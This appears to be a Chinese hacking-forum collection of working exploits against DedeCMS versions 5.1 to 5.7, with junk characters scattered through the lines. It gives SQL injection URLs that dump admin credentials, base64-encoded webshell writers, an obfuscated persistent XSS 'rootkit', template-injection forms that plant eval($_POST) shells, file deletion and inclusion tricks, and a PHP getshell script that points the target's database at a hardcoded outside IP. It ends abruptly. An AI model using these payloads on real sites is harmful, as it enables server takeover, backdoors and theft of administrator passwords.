|
|
* ^5 p' q' Q; b# \2 D7 b- k$ hDedecms 5.6 rss注入漏洞
# s0 ~7 |+ W" U/ t$ Q! Y$ c- p ahttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
_' M3 @" j% Y: I2 w8 N6 N, T( T; d; h/ e- P- N" T
& n8 r( U( g, c& |
5 d5 S- [1 Q2 j0 X# {
2 Q- O3 ]! z9 V* x
/ U: O+ I3 T2 C( v0 G/ \; h8 g+ K0 a* Y; o
8 U# w; i! B( r
- q7 Y P) |- z; W8 c
DedeCms v5.6 嵌入恶意代码执行漏洞: Q# X- ?6 ^# ]2 \5 d9 q2 r6 E
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}; I! x9 V* i0 G- R' _* F
发表后查看或修改即可执行. A9 c/ F7 C! [+ _/ S
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
: m! }& Q% a$ F% I: l' ^: Z生成x.php 密码xiao,直接生成一句话。
7 t I. A& @; W, J! y7 p/ g$ G/ i n }% O' F* Y% \) T1 T: }2 |
5 T/ t6 f! \* f; A5 ~; Q& d4 c3 W9 {/ u- M1 k0 e7 b6 d" ?
2 q1 t% p: N: L8 O' z% E6 x+ [1 h: D) o6 N! K0 ^! W& N
1 g, K, X8 I9 W5 ?3 k2 ]4 X
+ q6 v* u5 y5 v- ], f
* z3 C: s- j2 H1 _Dede 5.6 GBK SQL注入漏洞2 p, p* o" u, u! I Z
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';7 U! S. f8 k+ M* j) a3 L
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
9 T' z h) ]2 b" k! P* d+ @- J. q+ whttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
# Q$ ?: k1 t0 {/ s8 ^9 A! e2 G+ f
( `" ]5 l# Z- r% n. G A* O3 i8 o& ]
& N- F" o6 ~& x/ _3 ]+ k! l) O9 w2 [
! Q$ p) S; U6 i6 ^0 F6 E
' u5 ?; b% u6 @, V- j; D! m: s# ~8 \! q* T+ M( j
7 T& c) \. B8 Z% p \9 s0 i
6 b) c* I9 Z' Y$ h% U w1 [
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! ?* ~* {9 u8 p- G) s: R: f0 xhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
2 J, C: i) r- V v& V8 I( c
+ x% M/ r$ r0 Y
0 @* m2 i( D& k! g
% f' U' P! A& g7 Y! _: R5 v1 ]; S+ E1 r9 h' C: o
/ z1 A3 k; h u1 f6 ^4 d' n% ]5 `- n7 T; d" A; V9 v# H9 F. R3 X
DEDECMS 全版本 gotopage变量XSS漏洞. p8 x5 T! r) ^9 G
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
" j6 T* b- U5 Jhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
$ B: s( @2 J+ U$ }9 I1 t! u6 V. @7 p% b" k7 K
0 n1 f) M G: O6 \2 b: Y8 z; [( P- W
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
% F1 m. {3 {) Thttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
, A9 Z# L* ]! e# j7 x( ^
1 W( f' B5 E* F7 v8 |
8 d- G. N% w( e! \: ~. shttp://v57.demo.dedecms.com/dede/login.php' p" g9 N! m! L* E5 C, V
) D3 |* q& L: r! ~) h3 D
/ o' F: S( B* j* I/ T8 hcolor=Red]DeDeCMS(织梦)变量覆盖getshell
1 t+ K# A7 G* j; P#!usr/bin/php -w0 G& y1 w7 {3 i
<?php' j1 P8 {% H. w# Z$ c* y
error_reporting(E_ERROR);! h$ {( ~7 q! h$ ^
set_time_limit(0);4 [& T2 t+ X3 ?! }# C/ E
print_r('" s7 p0 o1 c h) [& j' D: @' `
DEDEcms Variable Coverage
$ T$ S5 N% u( C; tExploit Author: www.heixiaozi.comwww.webvul.com
1 e' n: x! ^- k- |9 D$ u: J7 u);
* v% A) g! e7 i& l6 oecho "\r\n";
+ F- d( M s' H4 j, |if($argv[2]==null){: g1 u6 L8 F: d5 [$ C- A0 Y
print_r('6 E, ]+ h2 r8 z8 b- `$ R8 @+ r
+---------------------------------------------------------------------------+
: q) ]* X, [) e5 T; f9 M0 JUsage: php '.$argv[0].' url aid path8 q/ Y& t/ [+ j: F$ o
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/ i, A! Y# M- r0 f# B
Example:
( g" Z- W4 F% [1 C, m8 }php '.$argv[0].' www.site.com 1 old
! B" m1 _' z# R; L7 V+---------------------------------------------------------------------------+
/ I5 b r3 B% A/ z1 L$ Z0 e');
+ b" r1 h) z9 u5 Qexit;! X+ s6 r% m. I1 H
} X$ k: h8 S- Y2 T. o6 y; f: \
$url=$argv[1];
6 [: X! S/ _3 q- l" W3 o9 _- [2 v: r$aid=$argv[2];; e" _9 X) t& T% p J
$path=$argv[3];
/ I/ f. }; b6 }$exp=Getshell($url,$aid,$path);2 L7 |$ i* J; ]# T1 w
if (strpos($exp,"OK")>12){
& z, G3 K J3 ^* W. g# N0 Z- becho "
3 V8 [2 v6 r& H* v! AExploit Success \n";
h4 |) ~2 @% Q7 rif($aid==1)echo ") Z* g) O, D. k& ]5 G) s( p( _
Shell:".$url."/$path/data/cache/fuck.php\n" ;
4 u1 E& u9 O. o, k6 d% O
9 ~ K: {, f- |! z: z) q' N" M! O3 \9 m& x" {2 K4 q) s
if($aid==2)echo "
; n4 `7 y1 u) VShell:".$url."/$path/fuck.php\n" ;7 v! ]( D7 a1 K1 B
* @+ M7 o/ f' o4 b7 g# v
) V; M' T9 z5 |if($aid==3)echo "
) H, s9 }% @7 g; a, `+ I5 E- L; s2 eShell:".$url."/$path/plus/fuck.php\n";: X, d8 J. x2 `& a. r' p
3 H; {% |7 V7 V9 n
X1 f/ w* b+ I/ s+ C( Z}else{+ l/ F: ~: T; i2 O, c7 f2 Z; G6 `
echo "
- H% s& s3 r1 v5 ^) z0 j* }1 pExploit Failed \n";
. X6 n$ x7 |8 ?8 e/ r9 N( X}' ?# C3 R, U: N- _7 e
function Getshell($url,$aid,$path){( |% E% d: d; X$ w0 f% \4 V9 P
$id=$aid;' R+ O/ x& u5 c$ H
$host=$url;
' s7 G6 L ]& h9 `9 k$port="80";
* U1 y; Z) V' C% j; o$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
. D: I8 N2 L! P" O; m$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
! Z8 i% H# u; b; k( m- u% X3 H$data .= "Host: ".$host."\r\n";) S8 S v# W; M6 ^. \
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";- ^6 P( Y5 H& |2 ^" n6 l% M! P
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";. `0 V/ j0 | K: G/ W( e% h
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
. z) [2 d9 u2 E( @% A# d# o0 p# N) c//$data .= "Accept-Encoding: gzip,deflate\r\n";
9 [ v/ } ~2 I( B$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
2 |( ], f p" _ J5 A4 `$data .= "Connection: keep-alive\r\n";/ m& w7 t' y1 b1 @* |
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";% v" n" e, Z8 e3 E9 f
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
, \# o9 h% s3 W% p' ~$ P+ R$data .= $content."\r\n";
3 H5 \9 E6 {7 u" i3 L$ock=fsockopen($host,$port);
$ q1 x/ ^ |0 O' W5 |if (!$ock) {
, G3 y, N7 z2 \& M4 mecho "
! @9 Z! C( e+ ^* ?No response from ".$host."\n";
7 g2 ?1 m' T+ ?$ A8 n; d, |& O9 w}3 t9 I* Z+ O" k9 b2 s& ?
fwrite($ock,$data);; t2 h7 d" D" L3 l9 d
while (!feof($ock)) {$ ]: z, Q) }* f6 M! v& `
$exp=fgets($ock, 1024);
3 |! L! i/ [' Ureturn $exp;/ a, ^" W) `# d( O1 K6 {
}" u: g8 J# \) P. \1 o- P, x
}8 T% @( C* T* X( H) U/ W& c
0 I: A( ~1 @1 C+ u: d% a# I
. J3 z! M, M1 Y, y+ l5 ~?>
" q/ }8 p, P' E0 A% b4 u' N7 P' d0 s
( H7 q. a) r5 N' M+ {7 O, I
* B- d/ G9 ^1 q* _, v. ]# A
7 O! y$ w a6 j. A3 J( O( l; K( q7 v) T. X/ ` |8 K3 d2 v
/ I0 u' ^1 v) h6 O3 E8 M( y1 |7 g u7 O
8 h( o; v8 F- D9 [7 p
5 Q" n! L, }$ \) w, @* `8 d' T) e4 S8 J$ a6 ?/ N$ P
; S* d8 x, V2 ?3 N& z& ADedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
6 L5 R# p9 X. shttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
* p; {0 E g& X) `1 E6 ~/ Y. F* a
2 k6 X( i6 y# \& J& B1 f
P7 U3 s+ X- r/ u把上面validate=dcug改为当前的验证码,即可直接进入网站后台
( g) s2 s+ f+ Y8 E! o4 M# V+ v
4 d3 G/ i9 r9 M3 ^1 g) A' m& x4 d, _9 G- ^8 S5 J
此漏洞的前提是必须得到后台路径才能实现! v O9 L- _5 k7 z
7 B* J& g0 B. d. l- E, L, \3 l$ ]9 f# v$ e" g0 [) s1 B
9 |3 ]" j& B6 ~# I* T1 E9 |& F
7 s# E4 k" D0 N9 ?. O' {
, o2 ^1 E* m8 F- J( N9 u4 e) a4 V8 q/ C, `% t# M& S% z8 q' l
( ?8 S4 C5 _: C3 {; m/ G% @# {! |, J, w# f3 e, U
' B' \0 ?' j7 H% K0 O5 K3 M: A( S
6 t9 C) X- w c9 n8 [4 ]Dedecms织梦 标签远程文件写入漏洞
$ Y7 s9 }& j6 T前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
4 n# K8 q: n- b/ D# p
' g: V9 @: G0 r4 D+ y {* ^
$ y2 Y. o2 ^3 S( l. Z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 # A* E- x M& p2 I! E
<form action="" method="post" name="QuickSearch" id="QuickSearch">4 T6 n2 i( z) {; D) ?3 b$ d
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
9 L! I, L/ b/ w7 t0 \. B<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> n) ~% S* G, O
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />' K4 k: l4 l& \
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
! c$ g/ {6 @. M8 L" b9 q0 J k* ^<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" ^0 ~- ~1 e# Y; D2 L
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
. L' B& X0 \' D# `: m% E<input type="text" value="true" name="nocache" style="width:400">
" `$ y) ~0 t$ }<input type="submit" value="提交" name="QuickSearchBtn"><br />
. C) `" [* u6 _ `: ]6 t/ q</form>- f2 j0 q( v s7 o9 L) q
<script>
8 Q- U/ @6 r5 @function addaction()# E$ Z9 n+ b, l3 B# u$ S
{+ d3 P( A; T, I4 |1 p# y8 i( B' j
document.QuickSearch.action=document.QuickSearch.doaction.value;- }& _& e0 x" U _6 C! j
}8 w: W2 ?. S3 b3 Z3 ^
</script>
; Z0 S7 `8 r- `& K
+ @% L3 \: ?7 x J& N8 ^ V
- R/ a0 b: c/ v ]: A0 Y1 S# j( M( T* q* n7 G* ~* }( G5 {
7 Y- E5 W6 i; h
$ F( i# E9 ~& Z* q; t. P0 Y" V8 o, ^' }( B( {' Y
, G o, N8 M( Q2 Y4 q
9 n6 I* _( I5 S5 k/ s, U3 Y8 A' N* E/ R2 e
* R6 ?; K$ t7 k( F" {5 G: s- t
DedeCms v5.6 嵌入恶意代码执行漏洞7 _! [. k) g! Y6 |& Y3 g
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行; s) [9 f3 [4 i( T( q
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}$ w) [6 j4 A- f2 w+ c$ L
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
2 B0 C! `1 O/ X5 tDedecms <= V5.6 Final模板执行漏洞; D4 |. J: z4 u: l- b O9 E' b
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
9 D0 e: t8 a" H' t4 d0 n2 |- guploads/userup/2/12OMX04-15A.jpg
# _$ D4 s& ~, O/ U1 B
/ j" {( m. ` Y7 Y% S" y' V" F9 p! x
模板内容是(如果限制图片格式,加gif89a):/ n- C" j5 Z [1 \" j
{dede:name runphp='yes'}
, |; b4 V8 m% s( I2 u/ v$fp = @fopen("1.php", 'a');
3 Y2 d9 U4 n. o) S) o5 Q@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
* g: j, D8 N3 I5 A9 x! b) e@fclose($fp);+ x1 W7 x* f: N1 k% M, L
{/dede:name}1 g9 ~; U; W( v1 J# n& G
2 修改刚刚发表的文章,查看源文件,构造一个表单:& v# I& s6 e7 g* Y1 c
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">1 i/ n& Q2 |4 p/ V
<input type="hidden" name="dopost" value="save" />
E! }1 P: K" s- a; |" h( k<input type="hidden" name="aid" value="2" />5 V5 }* W- P9 y* {* b8 y$ j
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
; a+ }7 D5 X/ P3 z8 f( \/ Q<input type="hidden" name="channelid" value="1" />
& l3 m! {% S* z: I5 C4 M, ~<input type="hidden" name="oldlitpic" value="" />
M8 h6 z9 y- {- G K! C) Z<input type="hidden" name="sortrank" value="1275972263" />
. G0 p' d9 R# q" v4 J7 P! i" e5 r5 s9 [9 E) T% x; A5 W b) ?/ U
7 A4 k% s& @* |. d, L0 q% i<div id="mainCp">
8 i( s0 o; P. n2 j" \- g<h3 class="meTitle"><strong>修改文章</strong></h3>. x5 ]3 o. X! e5 i4 w# L) v
3 B; {5 G( b/ I/ ]( q
& o) M& R# E2 l3 u2 m4 D; o5 m
<div class="postForm">( I2 g* Z9 ~# S/ K; u
<label>标题:</label>
, D: v7 t: Y- \0 B. @" Z<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
1 i3 l6 q. \4 [% `0 D7 F9 U- H9 l% \" g2 C, r
/ t# Y! W# A0 E3 m* B# ?; H$ R
<label>标签TAG:</label>
9 I/ y: s6 g* x! n9 E<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
# t2 q( b8 E1 z. H" L. z: ~7 ~3 I/ O4 ?9 h
" V7 B# V( W' o) i; L
<label>作者:</label>
! V8 N/ k1 t+ F& X<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
7 _9 _' V! J% ?2 d2 q+ l
4 l/ L0 a% R# p. i6 e
1 l. N- Q) H3 {1 f4 m" p<label>隶属栏目:</label>! L' X+ p& w* r9 J5 w
<select name='typeid' size='1'>% |/ [6 E" u' X5 w y1 ~
<option value='1' class='option3' selected=''>测试栏目</option>
4 d3 A" `1 \; D! C& D</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)1 @- Z6 R8 W7 C6 C: x# G4 ]
! d9 w9 J0 ^5 g' T8 t \5 @2 G/ B* n
- U; h) }5 L, X# R8 x7 x+ L8 V<label>我的分类:</label>8 }+ o- V, i3 S. k+ x4 z
<select name='mtypesid' size='1'>
/ D3 c) |0 I* `<option value='0' selected>请选择分类...</option>
6 r* `. |6 U$ W6 s% b0 o* O0 f<option value='1' class='option3' selected>hahahha</option> s* r, ]# E% c. ^: w! q. e; Y) n
</select>
3 M+ T5 c! I/ v8 ?8 X$ n3 d# v, j1 Z) C, P; t* L4 A
a2 W, E0 {8 c0 {- \( a
<label>信息摘要:</label>
6 D+ D- f! M I1 a# }" C: W<textarea name="description" id="description">1111111</textarea>/ m7 G" R+ m' n6 C( v
(内容的简要说明)% b' g p5 b5 A0 n& H+ x
) `2 K) r3 @8 [0 g
w5 z5 }* z* Y9 n6 P$ [6 o
<label>缩略图:</label>
- G) L- z ]# c7 Q! F<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>, S" _9 y4 h% B2 w' u; K
$ G& I% q+ d; O1 I9 |7 u( `' A) a3 O# _% T1 {5 P) J
<input type='text' name='templet'9 Y: b5 ~3 q. @% y. t8 r
value="../ uploads/userup/2/12OMX04-15A.jpg">
, D% ^) A. D2 i* T1 e7 E* I<input type='text' name='dede_addonfields'
+ h) Q4 B7 S) j" |value="templet,htmltext;">(这里构造)/ k% y- C @3 w) Y( {: P, W
</div>6 F/ t; [2 d% o0 F0 w: a5 a
2 K m3 {; t5 K" B
" ~ @9 p' m& ?
<!-- 表单操作区域 -->! h# A: _: W; V0 Z3 r V
<h3 class="meTitle">详细内容</h3>
6 y9 b2 o+ K1 _6 h9 O3 ^
/ V1 Z% ]7 C5 M: ~: A+ r
' _2 }; y' l( v7 i2 R: F/ \<div class="contentShow postForm">+ N# n" L& \+ u( Y( V0 o* m$ a+ R
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
) q' _$ |$ X# O9 t
: ~( s3 T q2 }
; A0 ?. Y3 l2 [1 P( V<label>验证码:</label>
0 H: k0 }: b* ~0 B% X; {<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
1 J% @" I: m/ A8 t8 \+ Y/ {<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />/ m t" k! L1 }/ L) q( B
9 U6 B$ u3 T3 |
& _6 P. `% u& P F<button class="button2" type="submit">提交</button>7 _. e h# t* \: M8 U
<button class="button2 ml10" type="reset">重置</button>0 P% l6 d( ~8 a
</div>
- P g! F0 H4 X7 a$ O) _" c+ C; c, F& a# |
# J4 V4 F1 c; K</div>6 E+ e+ [ y7 O6 j' a7 ?/ j* k8 G" T
7 e( S) Y7 ^4 W
! L) o0 }/ Z, `2 }6 v. q
</form>
3 ^5 h5 f# N; X) W: z- S. t6 x- K; A6 n
g; @5 G, Z. G; f, E3 M' z提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:3 U9 `& X* @" u4 R% ?
假设刚刚修改的文章的aid为2,则我们只需要访问:, C6 ]7 U; z9 d
http://127.0.0.1/dede/plus/view.php?aid=2
, T6 s$ \5 p. ^/ }. L即可以在plus目录下生成webshell:1.php/ b; q' m3 \' U8 x6 u$ J# s+ }
9 b; a2 c8 B1 ?
% f+ K( ^; P4 l# F1 t3 c
* o1 n) ^2 R- q# z* Z
+ B( t3 `4 d F# b8 n+ t' Q9 ~& \7 O& W8 t7 i
8 `, f9 E3 i( g7 {
" m% B/ g: A( E3 f
$ [: J: `- v. a% R$ H& l
- J# Q9 o* ~2 e4 [3 ^' S7 a' _% H# `4 J) l4 {4 d
: m& H0 p9 V& h, ]% \& ~+ e* Z& ?' \5 w
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6); y- U0 `. Q2 U
Gif89a{dede:field name='toby57' runphp='yes'}5 p: U9 _( M2 n; M& W
phpinfo();
9 V. [+ S( A4 H2 H' A{/dede:field}
7 @7 R5 ]1 C) {7 T* R' @2 Z保存为1.gif- ]# z) ?' ^+ k1 l; N9 J
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 5 M6 R w- G# a F, R9 x/ F
<input type="hidden" name="aid" value="7" /> ! g) ^7 f9 h- t0 \3 U
<input type="hidden" name="mediatype" value="1" /> ' R! Y5 A o6 Q6 \/ O# S
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> $ n) y; C3 f1 c2 w$ \
<input type="hidden" name="dopost" value="save" /> 4 f1 X1 x- v3 S3 Q/ P
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ) W( }* W( ?* L8 A
<input name="addonfile" type="file" id="addonfile"/> f$ G& O: e0 z/ {- O
<button class="button2" type="submit" >更改</button> 3 B& s( X, a; [$ z7 t9 _' W; G
</form>
& i8 ~# x" U# }8 `6 G6 N9 S: u1 F" } J& g
4 z" z8 m! P- u6 P ^构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
" ^$ x3 v6 c0 j" v5 c' r! [发表文章,然后构造修改表单如下:
# T' m' i8 W. V1 o! T# G' V
1 u9 `' J7 p( O4 R1 C# v$ P H, u) L3 G R3 {! w
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
1 ?5 f: O+ R) E; Z5 E<input type="hidden" name="dopost" value="save" />
" \9 d- m" J2 n! w o<input type="hidden" name="aid" value="2" />
% H7 L% {- \( m8 A0 q- A. N' ?<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> , {, c! M; J# M6 V; }+ D4 O
<input type="hidden" name="channelid" value="1" /> 6 ]$ D4 d& V5 |. i* g1 J
<input type="hidden" name="oldlitpic" value="" /> 7 X) \" `- w/ N
<input type="hidden" name="sortrank" value="1282049150" />
, W) [3 t2 S; ^7 q! [9 c<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
5 `6 Y6 ], q1 f6 T+ i<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> " R) \2 m2 E% c; ~8 v
<select name='typeid' size='1'>
/ ?, g" @, G: j2 ]<option value='1' class='option3' selected=''>Test</option> 3 n7 q+ ~4 F2 U. q( z6 e0 |
<select name='mtypesid' size='1'>
3 g0 i: B. @, ?" B% |<option value='0' selected>请选择分类...</option>
/ @9 Z( G: Q' e; \! v; f# k" N" ?<option value='1' class='option3' selected>aa</option></select>
! V& u3 K8 w6 t: Q7 p<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> , W& S* Z( t4 U. r! M
<input type='hidden' name='dede_addonfields' value="templet">
6 v6 Z; t( g$ k3 r<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ) A p8 E8 I; e/ h/ \4 j
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
0 B# J1 V( U( A+ f. B# d: o( X<button class="button2" type="submit">提交</button> 6 O: e6 U) s7 Q0 [( Y% Z1 {5 R# r
</form>; g" F1 q! O5 H- i. Y
3 N% F. \: @; ?+ S; A
. Z- w3 j9 L, ?) K/ f2 _: F' _9 n L6 }% p( w# k/ {# |9 N b$ S/ ]
4 ]' y- G6 D# W6 s: z1 @
# p9 t7 P% I x" y8 N* E( D
2 I! R8 V( ~! R B4 [& o. }8 P+ h
) n, z% w( y( s* E4 t
. V9 K+ @2 ]3 A6 u, m# A
) R, \) p' f, [* j* R
& u: N7 U0 N6 W4 v
d3 w$ ^3 h- p7 b" N- [织梦(Dedecms)V5.6 远程文件删除漏洞
2 t6 U- a4 Q7 D' ^3 c" r2 dhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
- v6 ~2 v8 g* t" N
4 W' ~; e1 r6 C4 ], {
* R2 n, D9 `0 Y8 l2 o2 `- O8 C' K! k9 W* _( G0 P
! D. Q! f5 c1 C9 ~0 g& K3 Z l8 g' f$ Z9 o. _
- I1 \& l+ ?- o( d1 w8 y* `0 f) {, c' U2 [
: `$ \ {4 ^, f" Y
5 v& N! h* b9 t# j3 b& h
5 S9 |: P% v i织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
" _+ [7 n6 W3 k" Q1 B- O+ b) Ihttp://www.test.com/plus/carbuya ... urn&code=../../
/ a! C6 d) x( o. p R7 H- G& @6 R; o; c9 q
# S+ k9 r0 W2 F3 l
& Q) ?, ?6 g# d, s c$ K# s
% d8 F3 y( u! O) |7 L
7 I- F# f: W4 T
$ @1 t% G+ k; s
3 `' [% A3 r2 m# X7 ^: B9 w! O1 ?# }5 X9 X. N1 E# N# ]
1 H5 ?: l( u1 c$ f
! C' o: `: k4 U( o3 b
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 + f) U1 P$ }# S) b; f
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( H% G5 ]9 E- o9 B! w( Z密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5" q* o/ f- V I7 [; w
* e1 c' \& t# T, Q3 T4 I6 U5 }5 f( f3 C/ ]& |/ b
) r; n6 N5 E! }" w" k. B
. L; ^: k/ c7 l. D+ S6 Z `0 |
, C, K* J, o. b8 \1 w% Y) \4 A/ d
. @! F3 k: F/ M- J3 j0 F# I8 m+ O6 |
; g% f( x! \: y! x3 y8 ^' K$ N( P& l: o Z3 U
7 `$ P% ^ w7 u( X& ?0 i织梦(Dedecms) 5.1 feedback_js.php 注入漏洞. |+ u* H# G; s9 b2 }
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='' B; b# j8 f. O/ m' m
, q" z. L" Q2 o% ?
/ R0 N3 K) T; `) U3 d3 I
' N/ ~* j9 E2 b) X- ]
, {4 q/ P# B$ C- w& H& W1 ~$ v( f, l' H$ e+ E
( @4 U% e3 b. D9 G4 R6 Z- ?$ q2 r* o! L( E% x6 X, e
7 B" d+ S# c3 b& h! R0 S( \" w: X2 Q. k1 L
9 w0 G. r4 }( N6 N: u织梦(Dedecms)select_soft_post.php页面变量未初始漏洞1 q. V/ j. X: n, G2 M
<html>+ j. |( E t# q0 t; B9 y" x
<head>( [. n4 M) i* D! b7 b
